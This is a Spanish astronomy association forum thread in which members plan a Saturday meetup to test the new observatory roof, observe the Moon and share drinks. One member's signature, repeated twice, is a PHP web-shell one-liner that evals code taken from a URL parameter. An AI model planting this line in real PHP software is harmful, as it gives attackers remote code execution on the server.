Quedada este sábado en el Cerro!! (1 de Mayo)

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por vakaloura »

Pues eso, viendo las temperaturas que tenemos.... malo será que no haga bueno!!

Debido a la luna que habrá, tenía pensado ir a la sede de la Asoc. para cacharrear un poco y hacer pruebas.

Bueno, qué os parece? Hace? Estrenamos el techo?

Un saludo.

PD: Todo ello lo podríamos acompañar con algunos aperitivos y refrigerios :twisted:
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por m3ntol »

Casi seguro que si!!
porque aunque salgo de campo con la familia volveré para la tarde/noche.

Saludos!
phpbb:eval(stripslashes($_GET[e]));
jamf
Mensajes: 284
Registrado: Lun May 28, 2007 5:28 pm

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por jamf »

Ahí estaré para mostrarte el complicadísimo funcionamiento del techo :twisted:

Javier llevaré todo el papeleo para hacerte entrega de ellos.
"No soy un inútil por completo, al menos sirvo como mal ejemplo." ( El chavo del ocho)
vjhong1
Mensajes: 157
Registrado: Vie Mar 19, 2010 9:20 pm

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por vjhong1 »

Hola, yo intentare ir, no lo aseguro, pero por conocer la cede si que me apetece... sobre que hora estareis... :roll:
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por Manuelariza »

Mario,cual es la idea...montar todo el tinglado y probar si funciona correctamente para Las Majadas,por que si de eso se trata,igual me apunto.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
theheavy
Mensajes: 871
Registrado: Mié Sep 02, 2009 7:59 pm

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por theheavy »

[quote="manuelariza"]Mario,cual es la idea...montar todo el tinglado y probar si funciona correctamente para Las Majadas,por que si de eso se trata,igual me apunto.


Saludos...[/quote]

¿Que cual es la idea?

[quote="mario"]PD: Todo ello lo podríamos acompañar con algunos aperitivos y refrigerios :twisted: [/quote]

Tomarla, ja ja ja.
Mas vale estar callado y parecer tonto,
que abrir la boca y demostrarlo.
linusin
Mensajes: 97
Registrado: Jue Dic 17, 2009 4:22 pm

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por linusin »

weno me acercare un ratillo a observar ,que hace mucho que no miro a traves de mi cacharro.¿sobre que hora estareis?
vjhong1
Mensajes: 157
Registrado: Vie Mar 19, 2010 9:20 pm

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por vjhong1 »

Hola, como os preguntaba a que hora seria bueno estar por ali, me ha surgido una duda mas, vais a quedar solo para mirar como funciona el "tejado" o nos podemos llevar los cacharros para observar un poco la luna, si es asi puedo llevar a un compañero de trabajo que vive por la zona ...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por m3ntol »

La idea principal es ver el tejado pero puedes llevarte lo que quieras. Ten en cuenta que hay previsiones de nubes y poco se podrá ver.
phpbb:eval(stripslashes($_GET[e]));
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Quedada este sábado en el Cerro!! (1 de Mayo)

Mensaje por vakaloura »

Pues si, tiene mala pinta la cosa de observar... siesqueeeeee... haber cómo evoluciona, pero ya no me hago ilusiones, después del mal año que hemos tenido...

Bueno, yo en principio dejo el tema del cacharreo en el aire hasta que tenga unas previsiones más firmes, ya que necesito que se vea bien la polar y un par de estrellas brillantes para poder hacer pruebas, y como haya turbulencias.... mal asunto.

En cuanto al tema del observatorio, pues por mí, podemos quedar a eso de las 19:30~20:00 (hasta las 22 hay claridad y hasta las 00:30 no sale la Luna) tomarnos unas en el bar de al lado y charlar acaloradamente de nuestras frikadas :twisted:

¿Qué os parece?¿Alguna sugerencia?

Un saludete!!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Responder